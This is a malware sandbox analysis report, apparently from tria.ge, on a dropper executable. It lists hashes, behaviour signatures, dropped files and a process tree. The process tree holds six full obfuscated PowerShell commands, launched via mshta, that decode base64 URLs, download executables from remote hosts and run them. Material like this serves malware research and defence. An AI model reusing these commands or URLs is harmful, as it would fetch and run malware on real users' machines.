Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    25/06/2022, 09:08

General

  • Target

    a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe

  • Size

    1.9MB

  • MD5

    b0b47d69cc54b277235b470ba486c710

  • SHA1

    c7f46aba6a3c8b929f322585dc162ae98129221d

  • SHA256

    a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3

  • SHA512

    5565c09d98017f3eb1065bbd1c3d7870a41e29597ed17f39eaebabc4cd1ee7255ef817a15643cc32ededacebfdeee4ebf7bcc5f08cfa55b50c48cf3e40392d9a

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://asdsadasrdc.ug/asdfg.exe

exe.dropper

http://asdsadasrdc.ug/asdfg.exe

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 6 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe
    "C:\Users\Admin\AppData\Local\Temp\a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1532
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\80ED.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2748
      • C:\Users\Admin\AppData\Local\Temp\_outputcrack.exe
        _outputcrack.exe
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:5104
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\50CF.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\_outputcrack.exe"
          4⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:3180
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            5⤵
            • Delays execution with timeout.exe
            PID:4548
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4524
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wgcxnm $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wgcxnm syfpbmd $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|syfpbmd;wgcxnm zkfwidtoglep $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2N1dHQubHkvemV5SHF5SA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);zkfwidtoglep $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
              6⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1256
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            5⤵
            • Delays execution with timeout.exe
            PID:1376
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4132
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fwlunt $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fwlunt tawoxvyelijpum $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tawoxvyelijpum;fwlunt fsqevtxyumpr $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2FzZHNhZGFzcmRjLnVnL2FzZGZnLmV4ZQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);fsqevtxyumpr $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
              6⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1764
              • C:\Users\Public\arp.exe
                "C:\Users\Public\arp.exe"
                7⤵
                • Executes dropped EXE
                PID:3824
          • C:\Windows\SysWOW64\timeout.exe
            timeout 3
            5⤵
            • Delays execution with timeout.exe
            PID:4164
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:208
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fydir $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fydir bqzfr $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bqzfr;fydir htfdxvgcn $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL3Rpbnl1cmwuY29tL3kzcDc3dWZl';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);htfdxvgcn $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
              6⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3720
          • C:\Windows\SysWOW64\timeout.exe
            timeout 4
            5⤵
            • Delays execution with timeout.exe
            PID:216
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:5044
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL saduxocqtzmby $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;saduxocqtzmby imgbedtwlzyok $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|imgbedtwlzyok;saduxocqtzmby evgskhmqljibn $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL21hcmFsc2tkcy51Zy9hc2RmZy5leGU=';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);evgskhmqljibn $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5056
          • C:\Windows\SysWOW64\timeout.exe
            timeout 5
            5⤵
            • Delays execution with timeout.exe
            PID:2100
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:5048
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL lnkdvtwhojby $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;lnkdvtwhojby tehacx $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tehacx;lnkdvtwhojby zkvslpeiwac $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9mYnNjaw==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);zkvslpeiwac $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
              6⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2132
          • C:\Windows\SysWOW64\timeout.exe
            timeout 6
            5⤵
            • Delays execution with timeout.exe
            PID:4440
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3836
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL lpyeqrz $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;lpyeqrz dpwges $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|dpwges;lpyeqrz ynlpmogafidr $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL3BhaXBhaXNkdnp4Yy5ydS9hc2RmZy5leGU=';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);ynlpmogafidr $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5024

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    25604a2821749d30ca35877a7669dff9

    SHA1

    49c624275363c7b6768452db6868f8100aa967be

    SHA256

    7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

    SHA512

    206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    d4d8cef58818612769a698c291ca3b37

    SHA1

    54e0a6e0c08723157829cea009ec4fe30bea5c50

    SHA256

    98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

    SHA512

    f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    d4d8cef58818612769a698c291ca3b37

    SHA1

    54e0a6e0c08723157829cea009ec4fe30bea5c50

    SHA256

    98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

    SHA512

    f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    d4d8cef58818612769a698c291ca3b37

    SHA1

    54e0a6e0c08723157829cea009ec4fe30bea5c50

    SHA256

    98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

    SHA512

    f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    d4d8cef58818612769a698c291ca3b37

    SHA1

    54e0a6e0c08723157829cea009ec4fe30bea5c50

    SHA256

    98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

    SHA512

    f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    19KB

    MD5

    fb8739a928d4249d6d5e855385ab30a7

    SHA1

    ee84d14c42c55ea3304fdd56624ef83144fddd2f

    SHA256

    cefd5e4241cc15681c6e90bae415045807602a9c28939e745a1d649b0888e897

    SHA512

    af98046f4d25c7fc4b5176f55209ed33868cafa0d2401d0d28186d993780d39b738ea7876bc9ba2ba9516caaae2bc00b1e58ea636aa859bfd9fe1e4b1cf96bb4

  • C:\Users\Admin\AppData\Local\Temp\50CF.tmp\b.hta

    Filesize

    11KB

    MD5

    2c81f1d8d202dfaa50534d7401324fce

    SHA1

    955ec5779d4d4cba14e98ed14fa3f474c36d059a

    SHA256

    c0b1c6c1380abb47f9fd7ca7728149f0b6a2f56119116b7ad31d1df1678723cd

    SHA512

    1a84fc615a3829f7feb94558b2afe95c8b43942212dd7deb7b5103ac4a35afbb59da8504692972d8da8b6e744eb78efdf28cfea1df6c9dce5f536149c40916f0

  • C:\Users\Admin\AppData\Local\Temp\50CF.tmp\b1.hta

    Filesize

    11KB

    MD5

    5cee90fba6052aa18555a5aedb6545a2

    SHA1

    4dac96e8a4858ef748c4a23dea441c2d0c90737c

    SHA256

    ab44c1f385c343483d3213ae8c226f9a023ee5803bb07d5a85fb62aa3a0313d8

    SHA512

    f0715a5611414631dddbe2127a91d67dfb02b2cabd9ee94e20d44ba6354708de45cf8f8f1d617c40901abce0f3609a38255486a7ff9c04ceb46d6b80163d89c9

  • C:\Users\Admin\AppData\Local\Temp\50CF.tmp\ba.hta

    Filesize

    11KB

    MD5

    18f43f6d9704d278fb99236cdc439751

    SHA1

    b652f5ebbd3ef24feee2053203d962600de1e4cf

    SHA256

    288fb158f4c2d1852349e05215b3352a0fa8fed3efd494ea2fb603cf0bb910b0

    SHA512

    7fe958edcae3ca1f663c039bb4c0a49a74a141b5d3658ab700c1f7bb2b0e8900e70ef17632ef5febd5052eba4c2a1db1ab57e2d38d4141fcbfc3f260ef451bb5

  • C:\Users\Admin\AppData\Local\Temp\50CF.tmp\ba1.hta

    Filesize

    11KB

    MD5

    bc293d0abb1e83d4b3efb852ec6cd503

    SHA1

    57366b64757ec77113ddebc947e18878b0c002ed

    SHA256

    bfbddae3cd305621b016d235fac7619636609f473ecd9c44925983861bd992aa

    SHA512

    c842075e53b68f39a548dd1497b2227bcd8ea584b8df1cba74292159ecc65b6ef1a71165e62cad4abb23891acd2938ecf16a4fd97f333c604dace2cd5ed1590a

  • C:\Users\Admin\AppData\Local\Temp\50CF.tmp\m.hta

    Filesize

    11KB

    MD5

    87da84d144c0c3de8496f4db7aa43886

    SHA1

    90ca12c6f24d3fc20f0465a33f1607f3cd23481e

    SHA256

    fb64afdcb591fd581b8304788911c99ad946e2db79066fc42de120989944bfe0

    SHA512

    954cfbad14d54f0f1fb1d3528abb21f0800adf77a4b888f93204e78a15670431c425dd340496aa3fe431d60f99d063a1461d1f5589d84ee682764b0357c89368

  • C:\Users\Admin\AppData\Local\Temp\50CF.tmp\m1.hta

    Filesize

    11KB

    MD5

    75c942a1fcacafe136b2a96e928e0202

    SHA1

    ae7ae439fe2a2d5101cc0af1e5578995a30e7859

    SHA256

    b333190b12515100bebeceb83c10ee7942f68e5765702b81bd6209788c4f04ea

    SHA512

    cba71256c3d08e254b7c57196cdd47e748f470f0d8bc4b6f998e7b78b343b071d05123eb0cc7f6134681e6c2c2436dc7e8b5eedc5c289b2f05677b9d10475e2a

  • C:\Users\Admin\AppData\Local\Temp\50CF.tmp\start2.bat

    Filesize

    194B

    MD5

    590abfac7d6aeca7cdd69ac155508300

    SHA1

    b810396782f6c372aad9bd166a142b737909c9d2

    SHA256

    5f1c0e8004630621436a9769d1df115c854947984b91b38420487c20d368ccd8

    SHA512

    8542f862b12ec15c5ef3851613aa5264a745b3a34c249286588947d7030602454020006ff30d110d2308798a1e2c1cfeb2a33ed23a0b11793ef73d0c106d1793

  • C:\Users\Admin\AppData\Local\Temp\80ED.tmp\start2.bat

    Filesize

    69B

    MD5

    e98d4e29be5a27f8aff16b61369e5b88

    SHA1

    f1819a3d9329cea8d1603143bb81efd0a0404cd4

    SHA256

    af355683e78c8fa03f49c0621890eff7ee3ed2d9507ae45361a7ee271f20b74d

    SHA512

    ade3ad78ecbb269124df78400b6376af21baf6246b101a9332eacf4271ce40d88ba3f42fc5f772f7dd69d7bb941fa55be68b1a6b1883f47782a2c55bc115e2d1

  • C:\Users\Admin\AppData\Local\Temp\_outputcrack.exe

    Filesize

    107KB

    MD5

    b47cde87fb3ede19c11022eaa530e7ed

    SHA1

    c00a4d999338b293f4d17f342b1f3f4ac572341c

    SHA256

    e83eb8e945e1fe3548c4ded6ff3f76c39ba8862a3d377f65e96fd0330917615f

    SHA512

    2890566d06cd53ffcc44d66b4ea76c2f33cb5d3509477963a4e873d25ce298aeb851cebea1401ce7130b7445c9ee48a73a533e0206c03efb9e48fc7fd607a5a0

  • C:\Users\Admin\AppData\Local\Temp\_outputcrack.exe

    Filesize

    107KB

    MD5

    b47cde87fb3ede19c11022eaa530e7ed

    SHA1

    c00a4d999338b293f4d17f342b1f3f4ac572341c

    SHA256

    e83eb8e945e1fe3548c4ded6ff3f76c39ba8862a3d377f65e96fd0330917615f

    SHA512

    2890566d06cd53ffcc44d66b4ea76c2f33cb5d3509477963a4e873d25ce298aeb851cebea1401ce7130b7445c9ee48a73a533e0206c03efb9e48fc7fd607a5a0

  • C:\Users\Public\arp.exe

    Filesize

    768KB

    MD5

    63645a9e1f5e77ba3c75366f3a14ab87

    SHA1

    ed1497c47dc283118bbc57d49cd9f354785cf73d

    SHA256

    2ced9b36b931b73b1d325bececd01f0e4fa6bd0fff98f8b76f2f45b473311cd0

    SHA512

    4efce16194322c1288603ccd4ab6507fa5905debb137ce9b200e7a76e2c041c2d2aa720061b0679f2dfb5c21a668e12fe5eeb5fe99542f5a88d4bcdf103296f0

  • C:\Users\Public\arp.exe

    Filesize

    768KB

    MD5

    63645a9e1f5e77ba3c75366f3a14ab87

    SHA1

    ed1497c47dc283118bbc57d49cd9f354785cf73d

    SHA256

    2ced9b36b931b73b1d325bececd01f0e4fa6bd0fff98f8b76f2f45b473311cd0

    SHA512

    4efce16194322c1288603ccd4ab6507fa5905debb137ce9b200e7a76e2c041c2d2aa720061b0679f2dfb5c21a668e12fe5eeb5fe99542f5a88d4bcdf103296f0

  • memory/1256-147-0x0000000004F20000-0x0000000005548000-memory.dmp

    Filesize

    6.2MB

  • memory/1764-151-0x0000000004CA0000-0x0000000004CC2000-memory.dmp

    Filesize

    136KB

  • memory/1764-166-0x0000000004D10000-0x0000000004D2E000-memory.dmp

    Filesize

    120KB

  • memory/1764-153-0x0000000005540000-0x00000000055A6000-memory.dmp

    Filesize

    408KB

  • memory/1764-152-0x0000000004E40000-0x0000000004EA6000-memory.dmp

    Filesize

    408KB

  • memory/1764-146-0x0000000002230000-0x0000000002266000-memory.dmp

    Filesize

    216KB

  • memory/1764-168-0x0000000006A40000-0x0000000006A5A000-memory.dmp

    Filesize

    104KB

  • memory/2132-167-0x0000000007F20000-0x000000000859A000-memory.dmp

    Filesize

    6.5MB

  • memory/3720-170-0x00000000070D0000-0x00000000070F2000-memory.dmp

    Filesize

    136KB

  • memory/3824-182-0x0000000004CC0000-0x0000000004D36000-memory.dmp

    Filesize

    472KB

  • memory/3824-179-0x00000000003B0000-0x0000000000476000-memory.dmp

    Filesize

    792KB

  • memory/5024-171-0x0000000008200000-0x00000000087A4000-memory.dmp

    Filesize

    5.6MB

  • memory/5056-169-0x0000000007020000-0x00000000070B6000-memory.dmp

    Filesize

    600KB